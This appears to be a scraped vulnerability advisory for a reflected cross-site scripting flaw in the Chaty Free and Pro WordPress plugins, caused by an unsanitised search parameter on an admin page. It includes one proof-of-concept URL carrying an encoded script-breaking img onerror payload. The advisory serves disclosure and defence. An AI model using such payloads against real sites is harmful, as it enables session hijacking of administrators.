Chaty Free < 2.8.3 & Pro < 2.8.2 - Reflected Cross-Site Scripting

2021-12-0600:00:00

Krzysztof Zając

167

chaty

free

pro

2.8.3

2.8.2

reflected cross-site scripting

vulnerable

chaty-contact-form-feed

webpage

EPSS

0.001

Percentile

46.7%

JSON

The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting

http://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E

EPSS

0.001

Percentile

46.7%

JSON

Related for WPEX-ID:B5035987-6227-4FC6-BC45-1E8016E5C4C0